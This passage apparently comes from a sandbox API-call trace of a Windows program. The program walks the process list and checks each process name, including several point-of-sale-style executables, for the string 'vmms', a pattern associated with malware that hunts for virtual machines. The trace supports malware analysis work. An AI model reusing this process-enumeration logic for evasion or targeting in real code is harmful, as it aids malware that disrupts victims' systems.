lpUsedDefaultChar=0x0) returned 18 [0101.718] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f0e0 [0101.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357f0e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0101.718] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0101.718] StrStrIA (lpFirst="creditservice.exe", lpSrch="vmms") returned 0x0 [0101.718] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0101.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.719] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356fb58 [0101.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x356fb58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0101.719] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0101.719] StrStrIA (lpFirst="edcsvr.exe", lpSrch="vmms") returned 0x0 [0101.719] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0101.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.720] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356fb70 [0101.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x356fb70, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0101.720] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0101.720] StrStrIA (lpFirst="fpos.exe", lpSrch="vmms") returned 0x0 [0101.720] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0101.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.722] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f8a0 [0101.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x356f8a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0101.722] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0101.722] StrStrIA (lpFirst="isspos.exe", lpSrch="vmms") returned 0x0 [0101.722] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0101.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.723] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f1a0 [0101.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357f1a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0101.723] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0101.723] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="vmms") returned 0x0 [0101.723] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0101.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.725] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fd38 [0101.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x356fd38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0101.725] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0101.725] StrStrIA (lpFirst="omnipos.exe", lpSrch="vmms") returned 0x0 [0101.725] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0101.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.726] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356fc60 [0101.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x356fc60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0101.726] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0101.726] StrStrIA (lpFirst="spcwin.exe", lpSrch="vmms") returned 0x0 [0101.726] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0101.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.727] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357f100 [0101.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357f100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0101.727] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0101.727] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="vmms") returned 0x0 [0101.728] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0101.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.729] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356fe58 [0101.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x356fe58, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0101.729] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0101.734] StrStrIA (lpFirst="utg2.exe", lpSrch="vmms") returned 0x0 [0101.734] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0101.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.735] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356fd98 [0101.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x356fd98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0101.735] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0101.735] StrStrIA (lpFirst="saying.exe", lpSrch="vmms") returned 0x0 [0101.735] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0101.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.736] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356fc18 [0101.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x356fc18, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0101.736] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0101.736] StrStrIA (lpFirst="ripe.exe", lpSrch="vmms") returned 0x0 [0101.736] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0101.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.738] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356fca8 [0101.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x356fca8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0101.738] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0101.738] StrStrIA (lpFirst="acoustic.exe", lpSrch="vmms") returned 0x0 [0101.738] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0101.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.739] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356fe28 [0101.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x356fe28, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0101.739] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0101.739] StrStrIA (lpFirst="mail.exe", lpSrch="vmms") returned 0x0 [0101.739] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0101.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.740] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356fdb0 [0101.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356fdb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0101.740] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0101.740] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="vmms") returned 0x0 [0101.741] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.742] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fc90 [0101.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356fc90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.742] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.742] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.742] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0101.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.743] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fdc8 [0101.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x356fdc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.743] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0101.743] StrStrIA (lpFirst="dllhost.exe", lpSrch="vmms") returned 0x0 [0101.743] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.790] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356fcf0 [0101.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356fcf0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0101.791] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0101.791] StrStrIA (lpFirst="taskhostw.exe", lpSrch="vmms") returned 0x0 [0101.791] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0101.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.793] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356fc00 [0101.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x356fc00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0101.794] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0101.794] StrStrIA (lpFirst="UsoClient.exe", lpSrch="vmms") returned 0x0 [0101.794] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.795] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356fc78 [0101.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356fc78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0101.795] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0101.795] StrStrIA (lpFirst="taskhostw.exe", lpSrch="vmms") returned 0x0 [0101.795] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0101.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0101.797] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357f120 [0101.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357f120, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0101.797] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0101.797] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="vmms") returned 0x0 [0101.797] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0101.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.798] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f1e0 [0101.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357f1e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0101.798] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0101.798] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="vmms") returned 0x0 [0101.798] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0101.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.800] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x357e4d8 [0101.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x357e4d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0101.800] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0101.800] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="vmms") returned 0x0 [0101.800] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.801] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fc30 [0101.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356fc30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.801] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0101.801] StrStrIA (lpFirst="conhost.exe", lpSrch="vmms") returned 0x0 [0101.801] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, 